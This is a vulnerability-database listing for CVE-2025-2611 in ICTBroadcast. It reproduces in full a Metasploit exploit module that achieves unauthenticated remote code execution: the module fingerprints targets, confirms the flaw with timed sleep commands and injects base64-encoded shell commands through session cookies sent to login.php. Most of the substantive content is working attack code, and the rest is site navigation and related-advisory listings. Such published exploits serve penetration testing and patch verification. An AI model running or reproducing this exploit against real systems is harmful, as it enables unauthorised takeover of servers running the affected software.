Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

📄 ICTBroadcast Unauthenticated Remote Code Execution

🗓️ 05 Aug 2025 00:00:00Reported by Valentin LobsteinType 
packetstorm
 packetstorm🔗 packetstorm.news👁 189 Views

Exploits unauthenticated remote code execution in ICTBroadcast via session cookies allowing arbitrary commands.

Related
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2025-2611
5 Aug 202507:39
circl
CNNVD		ICT Innovations ICTBroadcast 安全漏洞
5 Aug 202500:00
cnnvd
CVE		CVE-2025-2611
5 Aug 202515:00
cve
Cvelist		CVE-2025-2611 ICTBroadcast <= 7.4 Unauthenticated Session Cookie RCE
5 Aug 202515:00
cvelist
EUVD		EUVD-2025-23629
5 Aug 202515:00
euvd
Metasploit		ICTBroadcast Unauthenticated Remote Code Execution
5 Aug 202518:56
metasploit
Nuclei		ICTBroadcast - Command Injection
3 Jun 202606:04
nuclei
NVD		CVE-2025-2611
5 Aug 202515:15
nvd
Packet Storm		📄 ICTBroadcast 7.0 Remote Code Execution
17 Dec 202500:00
packetstorm
Positive Technologies		PT-2025-31937
19 Mar 202500:00
ptsecurity
Rows per page
##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking
    
      include Msf::Exploit::Remote::HttpClient
      prepend Msf::Exploit::Remote::AutoCheck
    
      def initialize(info = {})
        super(
          update_info(
            info,
            'Name' => 'ICTBroadcast Unauthenticated Remote Code Execution',
            'Description' => %q{
              This module exploits an unauthenticated remote code execution (RCE) vulnerability
              in ICTBroadcast. The vulnerability exists in the way session cookies are handled
              and processed, allowing an attacker to inject arbitrary system commands.
            },
            'Author' => [
              'Valentin Lobstein' # Metasploit module author and vulnerability discovery
            ],
            'License' => MSF_LICENSE,
            'References' => [
              ['URL', 'https://www.ictbroadcast.com/'],
              ['CVE', '2025-2611']
            ],
            'Platform' => %w[unix linux],
            'Arch' => [ARCH_CMD],
            'Targets' => [
              [
                'Unix/Linux Command Shell',
                {
                  'Platform' => %w[unix linux],
                  'Arch' => ARCH_CMD
                }
              ]
            ],
            'DefaultTarget' => 0,
            'Privileged' => false,
            'DisclosureDate' => '2025-03-19',
            'Notes' => {
              'Stability' => [CRASH_SAFE],
              'Reliability' => [REPEATABLE_SESSION],
              'SideEffects' => [IOC_IN_LOGS]
            }
          )
        )
      end
    
      def get_valid_cookies
        @get_valid_cookies ||= begin
          print_status('Retrieving session cookies dynamically')
          res = send_request_cgi(
            'method' => 'GET',
            'uri' => normalize_uri(target_uri.path, 'login.php')
          )
          fail_with(Failure::UnexpectedReply, 'No response from server') unless res
    
          if (cookies = res.get_cookies)
            cookie_jar.clear
            cookie_jar.parse_and_merge(
              cookies,
              "#{datastore['SSL'] ? 'https' : 'http'}://#{rhost}:#{rport}"
            )
            print_status("Found cookies: #{cookie_jar.cookies.map(&:to_s).join('; ')}")
          end
    
          cookie_jar
        end
      end
    
      def inject_command(command)
        jar = get_valid_cookies
        return if jar.empty?
    
        jar.cookies.each do |c|
          original = c.value
          c.value = "`echo${IFS}#{Rex::Text.encode_base64(command)}|base64${IFS}-d|sh`"
    
          send_request_cgi(
            'method' => 'GET',
            'uri' => normalize_uri(target_uri.path, 'login.php'),
            'cookie_jar' => jar
          )
    
          c.value = original
        end
      end
    
      def check
        print_status('Checking ICTBroadcast via JS fingerprints')
    
        fingerprint_found = %w[
          IVRDesigner.js agent.js campaign.js campaign_feedback.js
          campaign_integration.js phone.js supervisor.js trunk.js
        ].any? do |file|
          uri = normalize_uri(target_uri.path, 'js', file)
          res = send_request_cgi!('method' => 'GET', 'uri' => uri)
          res&.code == 200 && res.body.include?('ICT Innovations')
        end
    
        return CheckCode::Safe unless fingerprint_found
    
        print_good('JS fingerprint found; performing timing tests')
    
        [3, 4, 5].sample(2).each do |t|
          start = Time.now
          inject_command("sleep #{t}")
          if Time.now - start >= (t - 0.3)
            return CheckCode::Vulnerable("Injected RCE (slept #{t}s)")
          end
        end
    
        CheckCode::Appears('Fingerprint present but timing did not match')
      end
    
      def exploit
        inject_command(payload.encoded)
      end
    end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
05 Aug 2025 00:00Current
8.3High risk
Vulners AI Score8.3
CVSS 49.3
EPSS0.756
SSVC
ictbroadcastunauthenticatedremote code executionsession cookiescookie vulnerabilitycve 2025-2611
189